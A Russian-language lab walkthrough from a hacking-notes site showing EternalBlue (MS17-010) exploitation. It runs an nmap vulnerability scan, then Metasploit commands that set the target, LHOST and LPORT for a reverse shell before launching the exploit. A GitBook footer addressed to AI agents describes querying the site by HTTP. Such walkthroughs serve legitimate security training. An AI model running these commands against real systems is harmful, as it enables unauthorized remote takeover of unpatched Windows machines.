> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/ports-and-services/smb-445/eternalblue-exploitation.md).

# Эксплуатация EternalBlue

## Эксплуатация EternalBlue - SMB /\[MS17-010]

Сканирование Nmap показывает, что на целевом сервере запущен Windows XP, поэтому имеет смысл проверить возможность эксплуатации MS17-010.

Запустите сканирование Nmap, чтобы проверить наличие уязвимости:

```bash
nmap --script "vuln and safe" -p445 10.10.10.4 -oN smbScan
```

Это сканирование подтверждает, что машина уязвима к MS17-010.

<figure><img src="/files/b9103edca9a51abf358ae9f1422e7b2c983aab43" alt=""><figcaption></figcaption></figure>

## **Эксплуатация с Metasploit**

Найдите эксплойт в Metasploit:

```
msfconsole 
search eternalblue 
```

Выберите первый из перечисленных эксплойтов:

```
use 1
```

<figure><img src="/files/6c4f91b5088db825427299b5db703a28fb1436e3" alt=""><figcaption></figcaption></figure>

Настройте параметры:

```bash
set RHOSTS 10.10.10.4
set LHOST 10.10.14.50
set LPORT 443
```

<figure><img src="/files/80382a6e565c350917623d4ea4dba38994f426ad" alt="" width="563"><figcaption></figcaption></figure>

Затем запустите эксплойт:

<figure><img src="/files/4d2c939d9e2198865a7cba3e366736fb7c469ac1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/ports-and-services/smb-445/eternalblue-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
